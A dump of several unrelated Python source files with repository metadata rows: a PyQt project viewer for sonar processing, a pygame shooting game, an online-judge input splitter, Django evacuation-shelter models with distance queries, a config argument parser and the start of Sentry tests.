        """Append one row per sector with that sector's status counts."""
        for sector, counts in self.status_dict.items():
            row = self.table.rowCount()
            self.table.insertRow(row)
            self.table.setItem(row, 0, QtWidgets.QTableWidgetItem(sector))
            for column, count_value in enumerate(counts.values(), start=1):
                self.table.setItem(row, column, QtWidgets.QTableWidgetItem(str(count_value)))
class LastRunTable(QtWidgets.QWidget):
    """
    Widget wrapping a QTableWidget with the UTC timestamp of the last run of
    each processing step, per sector.
    """

    def __init__(self, lastrun_dict: dict, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.vlayout = QtWidgets.QVBoxLayout()
        self.table = QtWidgets.QTableWidget()
        self.vlayout.addWidget(self.table)
        self.setLayout(self.vlayout)

        self.table.setSortingEnabled(True)
        self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
        self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)

        self.lastrun_dict = lastrun_dict
        # Header: sector identifier first, then one column per processing step.
        # Step keys carry a leading underscore; strip it and tag as UTC.
        first_sector = list(self.lastrun_dict)[0]
        self.headr = ['SerialNumber_SectorNumber_Frequency'] + [key[1:] + '_utc' for key in list(self.lastrun_dict[first_sector].keys())]
        self.table.setColumnCount(len(self.headr))
        for column, column_width in enumerate((250, 160, 200, 215, 215, 230, 200)):
            self.table.setColumnWidth(column, column_width)
        self.table.setHorizontalHeaderLabels(self.headr)
        self.populate()
        self.setMinimumHeight(300)
        self.vlayout.layout()

    def populate(self):
        """Append one row per sector with the last-run timestamp of every step."""
        for sector, run_times in self.lastrun_dict.items():
            row = self.table.rowCount()
            self.table.insertRow(row)
            self.table.setItem(row, 0, QtWidgets.QTableWidgetItem(sector))
            for column, timestamp in enumerate(run_times.values(), start=1):
                self.table.setItem(row, column, QtWidgets.QTableWidgetItem(timestamp))
class KlusterFqprView(QtWidgets.QWidget):
    """
    Tree view for one Fqpr instance, with three collapsible sections:
    multibeam files, sounding status and last-run process times.
    """

    def __init__(self, parent, fqpr_inst: Fqpr, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.parent = parent
        # fqpr = fully qualified ping record, the term for the datastore in kluster
        self.fqpr_inst = fqpr_inst
        self.dashboard_data = fqpr_inst.return_processing_dashboard()
        self.vlayout = QtWidgets.QVBoxLayout()
        self.tree = QtWidgets.QTreeWidget()
        self.tree.setHeaderHidden(True)

        self.mfile_table = MultibeamTable(self.dashboard_data['multibeam_files'])
        self._append_section('multibeam files', self.mfile_table)
        self.soundingstatus_table = StatusTable(self.dashboard_data['sounding_status'])
        self._append_section('sounding status', self.soundingstatus_table)
        self.lastrun_table = LastRunTable(self.dashboard_data['last_run'])
        self._append_section('last run process', self.lastrun_table)

        self.vlayout.addWidget(self.tree)
        self.setLayout(self.vlayout)

    def _append_section(self, title: str, widget: QtWidgets.QWidget):
        """Add a top-level tree item named title whose single child holds widget."""
        top_item = QtWidgets.QTreeWidgetItem([title])
        child_item = QtWidgets.QTreeWidgetItem(top_item)
        self.tree.setItemWidget(child_item, 0, widget)
        self.tree.addTopLevelItem(top_item)
class KlusterProjectView(QtWidgets.QWidget):
    """
    QTableWidget to display the data from an fqpr_intelligence IntelModule.

    Top row holds the project file path plus New/Open project buttons; the
    scrollable area below gets one collapsible KlusterFqprView per Fqpr
    instance in the loaded project.
    """

    # emitted with the path of a newly added file (connected externally)
    file_added = QtCore.Signal(str)

    def __init__(self, parent=None, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.parent = parent
        # currently loaded kluster_project.json path (None until new/open)
        self.project_file = None
        # FqprProject instance backing this view (None until new/open)
        self.project = None
        # per-Fqpr widgets currently shown, kept so they are not garbage collected
        self.loaded_fqpr_views = []
        self.loaded_collapsible = []
        self.mainlayout = QtWidgets.QVBoxLayout()
        self.hlayout = QtWidgets.QHBoxLayout()
        # read-only display of the active project file path
        self.fil_text = QtWidgets.QLineEdit('')
        self.fil_text.setMinimumWidth(400)
        self.fil_text.setReadOnly(True)
        self.hlayout.addWidget(self.fil_text)
        self.newproj_button = QtWidgets.QPushButton("New Project")
        self.hlayout.addWidget(self.newproj_button)
        self.openproj_button = QtWidgets.QPushButton("Open Project")
        self.hlayout.addWidget(self.openproj_button)
        self.mainlayout.addLayout(self.hlayout)

        # scrollable container for the per-Fqpr collapsible sections
        scroll = QtWidgets.QScrollArea()
        scroll.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        scroll_content = QtWidgets.QWidget()
        scroll_layout = QtWidgets.QVBoxLayout(scroll_content)
        scroll_content.setLayout(scroll_layout)
        self.datalayout = QtWidgets.QVBoxLayout()
        scroll_layout.addLayout(self.datalayout)
        scroll.setWidget(scroll_content)
        scroll.setWidgetResizable(True)
        self.mainlayout.addWidget(scroll)

        self.setLayout(self.mainlayout)
        self.setMinimumSize(1000, 600)

        self.newproj_button.clicked.connect(self.new_project)
        self.openproj_button.clicked.connect(self.open_project)

    def _load_from_project(self):
        """
        Build out the gui from the loaded project. Each fqpr instance gets it's own collapsible section
        """
        for fqpr_name, fqpr_inst in self.project.fqpr_instances.items():
            fqprview = KlusterFqprView(self, fqpr_inst)
            new_expand = CollapsibleWidget(self, fqpr_name, 100, set_expanded_height=800)
            new_layout = QtWidgets.QVBoxLayout()
            new_layout.addWidget(fqprview)
            new_expand.setContentLayout(new_layout)
            self.datalayout.addWidget(new_expand)
            # keep references so the widgets survive after this method returns
            self.loaded_fqpr_views.append(fqprview)
            self.loaded_collapsible.append(new_expand)
        self.datalayout.addStretch()
        self.datalayout.layout()

    def new_project(self):
        """
        Get the file path to a new project, create the project there and
        populate the view from it.
        """
        # dirpath will be None or a string
        msg, pth = RegistryHelpers.GetFilenameFromUserQT(self, RegistryKey='klusterintel', Title='Create a new Kluster project',
                                                         AppName='klusterintel', fFilter="*.json", bSave=True,
                                                         DefaultFile='kluster_project.json')
        if pth:
            # the project name is mandatory, just so that we can find it later, I ask for a file path for the project
            # file and override the filename, kind of messy but works for now
            if os.path.exists(pth):
                os.remove(pth)
            directory, filename = os.path.split(pth)
            project_file = os.path.join(directory, 'kluster_project.json')
            self.fil_text.setText(project_file)
            self.project_file = project_file
            self.project = FqprProject(is_gui=True)
            self.project.new_project_from_directory(directory)
            if self.parent:
                self.parent.set_project(self.project)
            self._load_from_project()

    def open_project(self):
        """
        Get the file path to an existing project file and load it.
        """
        # dirpath will be None or a string
        msg, pth = RegistryHelpers.GetFilenameFromUserQT(self, RegistryKey='klusterintel', Title='Open an existing Kluster project',
                                                         AppName='klusterintel', fFilter="*.json", bSave=False)
        if pth:
            self.fil_text.setText(pth)
            self.build_from_project(pth)

    def close_project(self):
        # Drop the active project; also tell the parent (if any) about it.
        self.fil_text.setText('')
        self.project = None
        if self.parent:
            self.parent.set_project(self.project)

    def build_from_project(self, project_path: str):
        """
        Load from a new project file, will close the active project and repopulate the gui

        Parameters
        ----------
        project_path
            path to a kluster project, kluster_project.json file
        """
        if os.path.exists(project_path):
            self.clear_project()
            self.project_file = project_path
            self.project = FqprProject(is_gui=True)
            # skip_dask: no dask cluster needed just to display the project
            self.project.open_project(self.project_file, skip_dask=True)
            if self.parent:
                self.parent.set_project(self.project)
            self._load_from_project()
            print('Loaded {}'.format(project_path))
        else:
            print('Unable to load from file, does not exist: {}'.format(project_path))

    def clear_project(self):
        """
        Clear the datalayout layout widget
        """
        clear_layout(self.datalayout)
def clear_layout(data_layout: QtWidgets.QLayout):
    """
    Recursively delete every widget (and empty every sub-layout) in a layout.

    Parameters
    ----------
    data_layout
        layout we want to clear
    """
    while data_layout.count():
        entry = data_layout.takeAt(0)
        entry_widget = entry.widget()
        if entry_widget is not None:
            # schedule widget deletion on the Qt event loop
            entry_widget.deleteLater()
        else:
            inner_layout = entry.layout()
            if inner_layout is not None:
                clear_layout(inner_layout)
class OutWindow(QtWidgets.QMainWindow):
    """
    Minimal main window hosting a KlusterProjectView, for manual testing.
    """

    def __init__(self, parent=None):
        super().__init__(parent)
        self.top_widget = QtWidgets.QWidget()
        self.setCentralWidget(self.top_widget)
        box = QtWidgets.QHBoxLayout()
        self.top_widget.setLayout(box)
        self.k_view = KlusterProjectView()
        self.k_view.setObjectName('kluster_projectview')
        box.addWidget(self.k_view)
        box.layout()
        self.setLayout(box)
        self.centralWidget().setLayout(box)
        self.show()
if __name__ == '__main__':
    import sys
    # PySide2's QApplication() can be built with no arguments, while PyQt5
    # requires an argv list and raises TypeError on the no-argument form.
    try:  # pyside2
        app = QtWidgets.QApplication()
    except TypeError:  # pyqt5
        app = QtWidgets.QApplication([])
    test_window = OutWindow()
    test_window.show()
    sys.exit(app.exec_())
"eyou102@gmail.com"
] | eyou102@gmail.com |
c5e5d2eb663a879d134533e2f810404fcb78ea02 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2560/60793/234058.py | e21cf4ae12c04d5d30fecf5c616f73a86565645e | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17 | py | print(2)
print(6) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
2148a1ec86f693f6250a590af5dd963cab9d67ae | eb4dd92bb28d60b9e967dcf4d3b380a29169774f | /MDRSREID/Settings/parser_args/parser_args.py | 1c60704bbc187c0850cc4ab93193e9a881c82bf0 | [] | no_license | qianqiansbaby/HJL-re-id | b972c441e780fdb83c176405bc644be4a7d48779 | 337de9e06fc43de1388fd719c5dea9d2d71f0df6 | refs/heads/master | 2023-01-10T13:45:02.502919 | 2020-10-15T12:09:52 | 2020-10-15T12:09:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,780 | py | import argparse
def parser_args():
    """
    Build the command-line interface for an experiment run and parse it.

    Only recognized options are consumed (``parse_known_args``), so any
    extra flags on the command line are ignored rather than raising.

    :return: argparse.Namespace with model_name, exp_dir,
        default_config_path, ow_config_path and ow_str attributes
    """
    cli = argparse.ArgumentParser()
    cli.add_argument('--model_name',
                     type=str,
                     default='MDRS',
                     help='[Optional] Model Name for experiment directory in current directory if exp_dir is None')
    cli.add_argument('--exp_dir',
                     type=str,
                     default='D:/weights_results/HJL-ReID/MDRS_ADAM_random_erasing_margin_0.3_market_best',  # 'D:/weights_results/HOReID/pre-trained', #
                     help='[Optional] Directory to store experiment output, '
                          'including log files and model checkpoint, etc.')
    cli.add_argument('--default_config_path',
                     type=str,
                     default='D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/default_config.py',
                     help='A configuration file.')
    cli.add_argument('--ow_config_path',
                     type=str,
                     default='D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/overwrite_config/MDRS_config_ADAM_best_market1501.txt',
                     help='[Optional] A text file, each line being an item to overwrite the cfg_file.')
    cli.add_argument('--ow_str',
                     type=str,
                     default='cfg.dataset.train.name = \'market1501\'',
                     help="""[Optional] Items to overwrite the cfg_file.
                        E.g. "cfg.dataset.train.name = \'market1501\''; cfg.model.em_dim = 256" """)
    parsed, _ = cli.parse_known_args()
    return parsed
| [
"nickhuang1996@126.com"
] | nickhuang1996@126.com |
488c48e4070442e1eb23a92e3e1d6d21f7bb8281 | d57b51ec207002e333b8655a8f5832ed143aa28c | /.history/1/PyGame/game_20200606102211.py | f4be514721bb31b6c5b2be71ebbace07010fe7cd | [] | no_license | yevheniir/python_course_2020 | b42766c4278a08b8b79fec77e036a1b987accf51 | a152d400ab4f45d9d98d8ad8b2560d6f0b408c0b | refs/heads/master | 2022-11-15T07:13:24.193173 | 2020-07-11T15:43:26 | 2020-07-11T15:43:26 | 278,890,802 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,736 | py | # 1 - Import library
# 1 - Import library
import pygame
from pygame.locals import *
import math
import random

# 2 - Initialize the game state
pygame.init()
width, height = 640, 480
screen = pygame.display.set_mode((width, height))
keys = [False, False, False, False]   # held state for W, A, S, D
playerpos = [100, 100]
acc = [0, 0]                          # [arrows that hit a badger, arrows fired]
arrows = []                           # each arrow is [angle, x, y]
badtimer = 100                        # frames until the next badger spawns
badtimer1 = 0                         # spawn-rate ramp: larger -> faster spawns
badguys = [[640, 100]]                # each badger is [x, y]
healthvalue = 194
pygame.mixer.init()

# 3 - Load images
player = pygame.image.load("resources/images/dude.png")
grass = pygame.image.load("resources/images/grass.png")
castle = pygame.image.load("resources/images/castle.png")
arrow = pygame.image.load("resources/images/bullet.png")
badguyimg1 = pygame.image.load("resources/images/badguy.png")
badguyimg = badguyimg1
healthbar = pygame.image.load("resources/images/healthbar.png")
health = pygame.image.load("resources/images/health.png")
gameover = pygame.image.load("resources/images/gameover.png")
youwin = pygame.image.load("resources/images/youwin.png")

# 3.1 - Load audio
hit = pygame.mixer.Sound("resources/audio/explode.wav")
enemy = pygame.mixer.Sound("resources/audio/enemy.wav")
shoot = pygame.mixer.Sound("resources/audio/shoot.wav")
hit.set_volume(0.05)
enemy.set_volume(0.05)
shoot.set_volume(0.05)
pygame.mixer.music.load('resources/audio/moonlight.wav')
pygame.mixer.music.play(-1, 0.0)
pygame.mixer.music.set_volume(0.25)

# 4 - keep looping through
running = 1
exitcode = 0
while running:
    badtimer -= 1
    # 5 - clear the screen before drawing it again
    screen.fill(0)
    # 6 - tile the grass and draw the castles
    for x in range(width // grass.get_width() + 1):
        for y in range(height // grass.get_height() + 1):
            screen.blit(grass, (x * 100, y * 100))
    screen.blit(castle, (0, 30))
    screen.blit(castle, (0, 135))
    screen.blit(castle, (0, 240))
    screen.blit(castle, (0, 345))
    # 6.1 - Rotate the player to face the mouse cursor and draw him
    position = pygame.mouse.get_pos()
    angle = math.atan2(position[1] - (playerpos[1] + 32), position[0] - (playerpos[0] + 26))
    playerrot = pygame.transform.rotate(player, 360 - angle * 57.29)
    playerpos1 = (playerpos[0] - playerrot.get_rect().width / 2, playerpos[1] - playerrot.get_rect().height / 2)
    screen.blit(playerrot, playerpos1)
    # 6.2 - Move arrows along their angle, dropping any that left the screen.
    # BUGFIX: the original reset its pop index to 0 inside the loop (always
    # removing the first arrow) and mutated the list while iterating it;
    # rebuilding the list avoids both problems.
    surviving_arrows = []
    for bullet in arrows:
        velx = math.cos(bullet[0]) * 10
        vely = math.sin(bullet[0]) * 10
        bullet[1] += velx
        bullet[2] += vely
        if not (bullet[1] < -64 or bullet[1] > 640 or bullet[2] < -64 or bullet[2] > 480):
            surviving_arrows.append(bullet)
    arrows = surviving_arrows
    for projectile in arrows:
        arrow1 = pygame.transform.rotate(arrow, 360 - projectile[0] * 57.29)
        screen.blit(arrow1, (projectile[1], projectile[2]))
    # 6.3 - Spawn and update badgers
    if badtimer == 0:
        badguys.append([640, random.randint(50, 430)])
        badtimer = 100 - (badtimer1 * 2)
        if badtimer1 >= 35:
            badtimer1 = 35
        else:
            badtimer1 += 5
    # BUGFIX: the original popped from badguys/arrows while iterating them,
    # which skips elements and can pop the wrong entry; rebuild the list.
    surviving_badguys = []
    for badguy in badguys:
        # off the left edge: drop it
        if badguy[0] < -64:
            continue
        badguy[0] -= 5
        # 6.3.1 - Attack castle when a badger reaches the left side
        badrect = pygame.Rect(badguyimg.get_rect())
        badrect.top = badguy[1]
        badrect.left = badguy[0]
        if badrect.left < 64:
            hit.play()
            healthvalue -= random.randint(5, 20)
            continue
        # 6.3.2 - Check for collisions with arrows (first hit kills both)
        hit_by_arrow = False
        for bullet_index, bullet in enumerate(arrows):
            bullrect = pygame.Rect(arrow.get_rect())
            bullrect.left = bullet[1]
            bullrect.top = bullet[2]
            if badrect.colliderect(bullrect):
                enemy.play()
                acc[0] += 1
                arrows.pop(bullet_index)
                hit_by_arrow = True
                break
        if not hit_by_arrow:
            surviving_badguys.append(badguy)
    badguys = surviving_badguys
    for badguy in badguys:
        screen.blit(badguyimg, badguy)
    # 6.4 - Draw the countdown clock.
    # BUGFIX: the original used "/" (true division in Python 3), which printed
    # floats like "1.2345:48.3"; integer division gives minutes:seconds.
    font = pygame.font.Font(None, 24)
    survivedtext = font.render(str((90000 - pygame.time.get_ticks()) // 60000) + ":" + str((90000 - pygame.time.get_ticks()) // 1000 % 60).zfill(2), True, (0, 0, 0))
    textRect = survivedtext.get_rect()
    textRect.topright = [635, 5]
    screen.blit(survivedtext, textRect)
    # 6.5 - Draw health bar (one pip per remaining health point)
    screen.blit(healthbar, (5, 5))
    for health1 in range(healthvalue):
        screen.blit(health, (health1 + 8, 8))
    # 7 - update the screen
    pygame.display.flip()
    # 8 - loop through the events
    for event in pygame.event.get():
        # check if the event is the X button
        if event.type == pygame.QUIT:
            # if it is quit the game
            pygame.quit()
            exit(0)
        if event.type == pygame.KEYDOWN:
            if event.key == K_w:
                keys[0] = True
            elif event.key == K_a:
                keys[1] = True
            elif event.key == K_s:
                keys[2] = True
            elif event.key == K_d:
                keys[3] = True
        if event.type == pygame.KEYUP:
            if event.key == pygame.K_w:
                keys[0] = False
            elif event.key == pygame.K_a:
                keys[1] = False
            elif event.key == pygame.K_s:
                keys[2] = False
            elif event.key == pygame.K_d:
                keys[3] = False
        if event.type == pygame.MOUSEBUTTONDOWN:
            # fire an arrow from the player's center toward the mouse
            shoot.play()
            position = pygame.mouse.get_pos()
            acc[1] += 1
            arrows.append([math.atan2(position[1] - (playerpos1[1] + 32), position[0] - (playerpos1[0] + 26)), playerpos1[0] + 32, playerpos1[1] + 32])
    # 9 - Move player with WASD
    if keys[0]:
        playerpos[1] -= 5
    elif keys[2]:
        playerpos[1] += 5
    if keys[1]:
        playerpos[0] -= 5
    elif keys[3]:
        playerpos[0] += 5
    # 10 - Win/Lose check: survive 90 seconds to win, lose when health runs out
    if pygame.time.get_ticks() >= 90000:
        running = 0
        exitcode = 1
    if healthvalue <= 0:
        running = 0
        exitcode = 0
if acc[1] != 0:
    accuracy = acc[0] * 1.0 / acc[1] * 100
else:
    accuracy = 0
# 11 - Win/lose display (loops forever until the window is closed)
if exitcode == 0:
    pygame.font.init()
    font = pygame.font.Font(None, 24)
    text = font.render("Accuracy: " + str(accuracy) + "%", True, (255, 0, 0))
    textRect = text.get_rect()
    textRect.centerx = screen.get_rect().centerx
    textRect.centery = screen.get_rect().centery + 24
    screen.blit(gameover, (0, 0))
    screen.blit(text, textRect)
else:
    pygame.font.init()
    font = pygame.font.Font(None, 24)
    text = font.render("Accuracy: " + str(accuracy) + "%", True, (0, 255, 0))
    textRect = text.get_rect()
    textRect.centerx = screen.get_rect().centerx
    textRect.centery = screen.get_rect().centery + 24
    screen.blit(youwin, (0, 0))
    screen.blit(text, textRect)
while 1:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            exit(0)
    pygame.display.flip()
"yevheniira@intelink-ua.com"
] | yevheniira@intelink-ua.com |
34344a8e8eeb096e794f7cd626ca3bc85ad0e7c6 | e14bc49af70260a891f56d2ce739ae005a32c360 | /hello.py | 3ece0382a9abf3407b7163d26cddf98bce84ad27 | [] | no_license | Marist-CMPT120-FA19/Anthony-Gandini-Lab-2 | 72512cd3b625313517bf68ac324e0b86e165c0b4 | 21e18284fbe5666faefe67b55c8373b44651f3f8 | refs/heads/master | 2020-07-20T10:33:40.575232 | 2019-09-05T17:57:28 | 2019-09-05T17:57:28 | 206,625,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | #Anthony Gandini
# CMPT-120 Lab 2
# Print a greeting to standard output (no trailing semicolon: not Python idiom).
print("Hello World!")
| [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
3cda84b7006d285ed9ce4c722c48031cff326c35 | 31dfdbde18ea2844895e453e5ee4a854d1ec35e9 | /onlinejudge/_implementation/command/split_input.py | c89385542db4cdc82cf728a6486c97e278548a9c | [
"MIT"
] | permissive | uta8a/online-judge-tools | 1d848f91749c4661c71ec527b18ac79a0b1ca419 | d9f1209c4e986a881181476c039f5051cd42d75d | refs/heads/master | 2020-04-27T07:43:16.882820 | 2019-03-04T13:17:35 | 2019-03-04T13:17:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | # Python Version: 3.x
import subprocess
import sys
import time
from typing import *
from typing.io import *
import onlinejudge
import onlinejudge._implementation.logging as log
import onlinejudge._implementation.utils as utils
if TYPE_CHECKING:
import argparse
def non_block_read(fh: IO[Any]) -> str:
    """Read whatever is currently available on fh without blocking.

    Switches the underlying file descriptor to non-blocking mode (a
    workaround for polling subprocess output) and returns the available
    text, or '' when nothing is ready yet.
    """
    import fcntl
    import os
    fd = fh.fileno()
    fl = fcntl.fcntl(fd, fcntl.F_GETFL)
    fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
    try:
        return fh.read()
    except Exception:
        # BUGFIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit. Any read failure (e.g.
        # BlockingIOError when no data is buffered) means "no output yet".
        return ''
# Sentinel meaning "derive the footer from the input file's last line".
split_input_auto_footer = ('__AUTO_FOOTER__', )  # this shouldn't be a string, so a tuple


def split_input(args: 'argparse.Namespace') -> None:
    """Split a combined input file into per-case files.

    Heuristic: feed args.input to args.command one line at a time; whenever
    the command produces output shortly after a line, the lines fed so far
    are assumed to form one complete test case and are written out.
    """
    with open(args.input) as fh:
        inf = fh.read()
    if args.footer == split_input_auto_footer:
        # auto mode: reuse the input's last line as the per-case footer
        args.footer = inf.splitlines(keepends=True)[-1]
    with subprocess.Popen(args.command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=sys.stderr) as proc:
        index = 0
        acc = ''  # lines accumulated for the current (not yet emitted) case
        for line in inf.splitlines(keepends=True):
            if args.ignore:
                # skip the first args.ignore lines from the saved output
                # (they are still fed to the command below)
                args.ignore -= 1
            else:
                acc += line
            proc.stdin.write(line.encode())
            proc.stdin.flush()
            # give the command time to react before polling its output
            time.sleep(args.time)
            if non_block_read(proc.stdout):  # if output exists
                index += 1
                path = utils.percentformat(args.output, {'i': str(index)})
                log.info('case found: %d', index)
                if args.header:
                    if args.header == args.header.strip():
                        acc = '\n' + acc
                    acc = args.header + acc
                if args.footer:
                    acc = acc + args.footer
                log.emit(log.bold(acc))
                with open(path, 'w') as fh:
                    fh.write(acc)
                log.success('saved to: %s', path)
                acc = ''
                while non_block_read(proc.stdout):  # consume all
                    pass
| [
"kimiyuki95@gmail.com"
] | kimiyuki95@gmail.com |
de13c219187366afe4cc847fe551db4d7c1b2c32 | 505343f6ace00d22f8753c1a943a5794a619e698 | /katas/Python/6 kyu/Consecutive strings 56a5d994ac971f1ac500003e.py | 1a7200b1a4cf9cbb3c6987b8b4f5039a7fc9099c | [] | no_license | bullet1337/codewars | 7652e50bf768bc47976a9124dd98b93602d4d458 | ba7f13ddd766158b41e036dae5d6b15f7f08761a | refs/heads/master | 2020-03-27T05:04:03.751302 | 2019-04-30T17:45:39 | 2019-04-30T17:45:39 | 145,991,995 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | # https://www.codewars.com/kata/56a5d994ac971f1ac500003e
def longest_consec(strarr, k):
    """Return the longest string made by joining k consecutive elements of
    strarr; on ties the earliest run wins.  Returns '' for invalid input."""
    if not strarr or not 0 < k <= len(strarr):
        return ''
    runs = (''.join(strarr[start:start + k]) for start in range(len(strarr) - k + 1))
    # max() keeps the first maximal element, matching the "earliest run" rule.
    return max(runs, key=len)
| [
"alichek95@mail.ru"
] | alichek95@mail.ru |
a4f3c184786b0f88401bb53010992e6b905798c5 | 5cf71ff8714bf0568394717c6176f371f929555d | /mizql/evacuation/models.py | e0176faf3d9cd45055e5c14d034afab27c9b873e | [
"MIT"
] | permissive | StudioAquatan/mizql | 66a9b1a8117dcb1f8dd86c94bb8632e076eb7996 | 340e44266a97dda846fbc17ce0edf85cee586f51 | refs/heads/master | 2020-04-04T13:12:54.361363 | 2018-11-11T06:20:15 | 2018-11-11T06:20:15 | 155,953,069 | 0 | 0 | MIT | 2020-03-15T09:21:09 | 2018-11-03T05:23:07 | JavaScript | UTF-8 | Python | false | false | 4,607 | py | from django.db import models
from django.contrib.auth import get_user_model
from django.db.models.expressions import RawSQL
from django.utils import timezone
class NearbyShelterManager(models.Manager):
    # Manager that augments Shelter querysets with a great-circle distance
    # (haversine-style, via raw SQL) from a given latitude/longitude.
    def with_distance(self, lat: float, lon: float):
        """
        Annotate the Shelter queryset with a ``distance`` column (kilometres
        from the given point).
        :param lat: latitude of the reference point, in degrees
        :param lon: longitude of the reference point, in degrees
        :return: queryset annotated with ``distance``
        """
        raw_queryset = self.get_queryset()
        # Raw SQL computing the spherical distance; 6371 is the Earth radius
        # in km, so the annotated value is in kilometres.
        query = """
        6371 * acos(
        cos(radians(%s)) * cos(radians(lat)) * cos(radians(lon) - radians(%s))
        + sin(radians(%s)) * sin(radians(lat))
        )
        """
        # Annotate the computed distance field (params: lat, lon, lat).
        queryset = raw_queryset.annotate(distance=RawSQL(query, (lat, lon, lat)))
        return queryset
    def get_nearby_shelters_list(self, lat: float, lon: float, distance: int):
        """
        Return shelters within a given radius of a point.
        :param lat: own latitude
        :param lon: own longitude
        :param distance: search radius in metres
        :return: queryset
        """
        queryset = self.with_distance(lat, lon)
        # Convert metres to kilometres to match the annotated distance unit.
        distance = distance / 1000
        # Keep only shelters inside the radius.
        return queryset.filter(distance__lte=distance)
class Shelter(models.Model):
    """
    Evacuation shelter model.
    """
    name = models.CharField(verbose_name='名前', max_length=255)
    address = models.CharField(verbose_name='住所', max_length=255)
    lat = models.FloatField(verbose_name='緯度')
    lon = models.FloatField(verbose_name='経度')
    capacity = models.IntegerField('収容可能人数', null=True)
    # Custom manager providing distance-annotated lookups (see above).
    objects = NearbyShelterManager()
    class Meta:
        # A shelter is uniquely identified by its coordinates.
        unique_together = ('lat', 'lon')
        ordering = ['name']
    def __str__(self):
        return self.name
class PersonalEvacuationHistory(models.Model):
    """
    Per-user evacuation history: one row per arrival/departure event.
    """
    user = models.ForeignKey(get_user_model(), verbose_name='ユーザ', on_delete=models.CASCADE,
                             related_name='evacuation_histories')
    shelter = models.ForeignKey(Shelter, verbose_name='避難所', on_delete=models.CASCADE,
                                related_name='personal_histories')
    created_at = models.DateTimeField('日付')
    # True = the user arrived at the shelter, False = the user went home.
    is_evacuated = models.BooleanField(verbose_name='避難しているか')
    class Meta:
        ordering = ['-created_at']
class EvacuationHistoryManager(models.Manager):
    def create(self, shelter: Shelter, now=None):
        """
        Snapshot the current number of evacuees at *shelter* and persist it.

        NOTE(review): the original docstring said "from 10 minutes ago to
        now", but the code actually counts events since the most recently
        recorded EvacuationHistory (or, lacking one, since the earliest
        personal history) — confirm which behavior is intended.
        :param shelter: shelter to snapshot
        :param now: snapshot time (defaults to the current time)
        :return: the saved EvacuationHistory instance
        """
        if now is None:
            now = timezone.now()
        latest_date = now
        latest_count = 0
        # Start from the most recent aggregate snapshot, if any.
        personal_histories = PersonalEvacuationHistory.objects.filter(shelter=shelter)
        latest_history = EvacuationHistory.objects.filter(shelter=shelter).order_by('-created_at').first()
        if latest_history is not None:
            latest_count = latest_history.count
            latest_date = latest_history.created_at
        else:
            # No aggregate snapshot yet: start from the newest personal event.
            last_history = personal_histories.order_by('-created_at').first()
            if last_history is not None:
                latest_date = last_history.created_at
        # Personal events recorded since the last snapshot.
        personal_histories = personal_histories.filter(created_at__range=[latest_date, now])
        # Number of arrivals.
        at_shelter_count = personal_histories.filter(is_evacuated=True).count()
        # Number of departures.
        at_home_count = personal_histories.filter(is_evacuated=False).count()
        # People currently at the shelter.
        current_count = latest_count + at_shelter_count - at_home_count
        hist = self.model(shelter=shelter, count=current_count, created_at=now)
        hist.save()
        return hist
class EvacuationHistory(models.Model):
    """
    Aggregate head-count snapshots per shelter over time.
    """
    shelter = models.ForeignKey(Shelter, verbose_name='避難所', related_name='histories', on_delete=models.CASCADE)
    count = models.IntegerField('避難している人数')
    is_demo = models.BooleanField('デモ用', default=True)
    created_at = models.DateTimeField('取得日')
    # Snapshots are created via the manager's custom create() above.
    objects = EvacuationHistoryManager()
    class Meta:
        ordering = ['-created_at']
| [
"s.kokuryo@gmail.com"
] | s.kokuryo@gmail.com |
93f6d14be8a72f664582b72967e13fe6d8809e82 | b32203aee03e22c29993b5c69ac263638927d550 | /tests/sentry/manager/tests.py | db652c22842af8804da57cfbb7ce710bd0c7fea8 | [
"BSD-2-Clause"
] | permissive | allanlei/sentry | 98d1d23b5827364a686ec0779e80e376bf81a57e | 888b8df0372d6d89dfe076bc025287785bcd1eee | refs/heads/master | 2020-12-25T01:30:29.651370 | 2013-01-04T19:41:50 | 2013-01-04T19:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,738 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import datetime
import mock
import pytest
from django.utils import timezone
from sentry.interfaces import Interface
from sentry.manager import get_checksum_from_event
from sentry.models import Event, Group, Project, MessageCountByMinute, ProjectCountByMinute, \
SearchDocument
from sentry.utils.db import has_trending # NOQA
from sentry.testutils import TestCase
class DummyInterface(Interface):
    # Minimal Interface subclass used as a stand-in by these tests.
    def __init__(self, baz):
        self.baz = baz
class SentryManagerTest(TestCase):
    """Exercises Group.objects.from_kwargs: event creation, tag/filter-value
    bookkeeping, counters, and resilience to broken collaborators."""
    # Event creation must survive a failing search indexer.
    @mock.patch('sentry.models.SearchDocument.objects.index')
    def test_broken_search_index(self, index):
        index.side_effect = Exception()
        event = Group.objects.from_kwargs(1, message='foo')
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
    # Event creation must survive a failing regression signal handler.
